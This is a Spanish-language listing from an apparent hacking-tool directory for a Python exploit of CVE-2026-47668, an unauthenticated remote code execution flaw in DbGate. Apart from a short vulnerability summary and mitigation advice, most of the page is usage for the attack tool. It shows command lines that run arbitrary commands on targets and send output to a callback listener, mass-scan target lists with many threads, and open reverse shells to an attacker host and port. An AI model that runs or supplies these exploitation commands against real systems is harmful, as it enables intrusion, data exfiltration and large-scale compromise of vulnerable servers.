Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-47668 — DbGate Unauthenticated Remote Code Execution | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-47668
Vulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access ToolPayload Development
GitHubnxploited/cve-2026-47668

CVE-2026-47668

DbGate Unauthenticated Remote Code Execution

Ver Repositorio
6hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-47668 — Ejecución Remota de Código en DbGate

RCE no autenticado en el ejecutor de scripts JSON de DbGate (dbgate-serve ≤ 7.1.8).
Herramienta de evaluación: CVE-2026-47668.py — solo para pruebas autorizadas.

CVECVE-2026-47668
SeveridadCrítico
ProductoDbGate / dbgate-serve
Afectado≤ 7.1.8
Corregido≥ 7.1.9
CVSS 3.1AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-20, CWE-94, CWE-1188

Vulnerabilidad

Título: Ejecución Remota de Código no Autenticado en DbGate a través del Ejecutor de Scripts JSON

Los campos controlados por el usuario (functionName, variableName) se incrustan en JavaScript generado dinámicamente sin la validación adecuada. Un atacante puede ejecutar código arbitrario en el proceso hijo del ejecutor de Node.js.

Mitigación: Actualice a 7.1.9+. Restrinja el acceso a la red, desactive la autenticación anónima, rote las credenciales, revise los registros en busca de actividad sospechosa en /runners/start.


Contacto

Telegram: @KNxploited


Resumen de la Herramienta

CVE-2026-47668.py verifica y valida la explotación contra instancias de DbGate que tiene autorización para probar.

Modos

Resultados

Directorio de salida: Nx/ (vuln, dispatch, exfil, failed, list_report, archivos por objetivo en exfil/)


Instalación

root@kitploit:~
pip install -r requirements.txt

Requiere: Python 3.9+, aiohttp, colorama


Uso

Asistente AUTO (predeterminado — sin reverse shell)

root@kitploit:~
python CVE-2026-47668.py
Entrada en el avisoEjemplo
URL únicahttp://192.168.1.10:3000
URL + comandohttp://192.168.1.10:3000|id
Lista de objetivostargets.txt

CLI — habilitar bandera

Cada ejecución CLI debe incluir --cli.

root@kitploit:~
python CVE-2026-47668.py --cli [opciones]

Objetivo único

-u / --url — URL base del objetivo

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000

--cmd / --command — comando del shell (predeterminado: id)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a"
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp"

--check-only — solo sonda de vulnerabilidad (sin comando)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only

--vector — vector de inyección: functionName | variableName | both

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id

--port — puerto predeterminado cuando la URL no tiene puerto (predeterminado: 3000)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id

--token — usar token Bearer existente

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id

--login-json — cuerpo de inicio de sesión personalizado (predeterminado: {"amoid":"none"})

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id

--timeout — tiempo de espera HTTP en segundos

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id

--secure — verificar certificados TLS

root@kitploit:~
python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id

Callback / exfiltración (predeterminado en CLI con --cmd)

--callback-host — IP/nombre de host que el objetivo usará para alcanzar su listener

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id

--listen-host — enlace local para el listener HTTP (predeterminado: 0.0.0.0)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id

--listen-port — puerto de exfiltración HTTP (predeterminado: 8888)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id

-c / --callback — URL de callback externa (deshabilita el listener incorporado)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id

--wait-exfil — segundos de espera para callback (objetivo único, predeterminado: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id

--no-b64 — enviar salida sin codificación base64

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id

--async-exec — exec asíncrono en lugar de execSync

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id

Escaneo masivo (sin reverse shell)

-f / --file — archivo de lista de objetivos

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id

-t / --threads — trabajadores concurrentes (predeterminado: 30)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50

--mass-wait-exfil — espera de callback por objetivo en modo masivo (predeterminado: 8)

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12

Masivo + puerto predeterminado personalizado

root@kitploit:~
python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id"

Reverse shell (opcional — solo un objetivo)

No es necesario para pruebas normales. Use exfiltración HTTP (--cmd) como prueba.

--reverse-shell — el objetivo se conecta a LHOST:LPORT (omitir valor = IP LAN + puerto 4444)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell
root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444

--revsh-port — puerto cuando --reverse-shell no tiene :port

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444

--revsh-bind — dirección de escucha local

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0

--wait-revsh — esperar TCP (predeterminado: 15)

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20

--revsh-interactive — retransmisión básica stdin/stdout después de la conexión

root@kitploit:~
python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive

Nota para Docker: use una IP alcanzable desde el contenedor DbGate (por ejemplo, la puerta de enlace del host), no solo 127.0.0.1 en su PC.


Lista de objetivos (targets.txt)

root@kitploit:~
# comentario
192.168.1.10
192.168.1.11:3000
http://10.0.0.8:3000
http://10.0.0.9|uname -a
https://dbgate.local|id
  • Sin puerto → se aplica 3000 automáticamente
  • host|command → anulación de comando por línea
  • Informe: Nx/list_report.txt

Archivos de salida


Flujo de trabajo

  1. POST /auth/login → token Bearer (automático a menos que se use --token)
  2. Sonda → el ejecutor acepta la inyección
  3. POST /runners/start → ejecutar comando + callback HTTP (o TCP inverso si está habilitado)
  4. Clasificar → EXFIL = salida confirmada

Aviso legal

Solo para pruebas de seguridad autorizadas. Debe tener permiso explícito para probar cualquier sistema. El autor no se hace responsable por el uso indebido o ilegal.


Por: Nxploited

Descargar herramienta
ElementoDetalle
EndpointPOST /runners/start
AuthRequiere Bearer; el token puede obtenerse mediante POST /auth/login en implementaciones anónimas o predeterminadas
InyecciónfunctionName, variableName en comandos JSON assign
ImpactoEjecución de comandos del sistema como el usuario del proceso DbGate
ModoReverse shellDescripción
AUTONoUn solo aviso; token + callback HTTP + valores predeterminados
CLIOpcionalControl total mediante banderas
MassNoEscaneo desde targets.txt
--reverse-shellSíVerificación TCP opcional (solo un objetivo)
ResultadoSignificado
FAILInalcanzable, autenticación fallida o no vulnerable
VULNEl ejecutor aceptó solo la sonda
DISPATCHCarga útil enviada; sin salida confirmada
EXFILCallback recibido — salida de comando confirmada
REVSHTCP inverso conectado (solo modo opcional)
ArchivoContenido
Nx/vuln.txtObjetivos vulnerables (sonda OK)
Nx/dispatch.txtCarga útil enviada, no confirmada
Nx/exfil.txtCallbacks confirmados
Nx/failed.txtObjetivos fallidos
Nx/exfil/<host>.txtSalida de comando por objetivo
Nx/sessions/<id>/summary.jsonResumen de sesión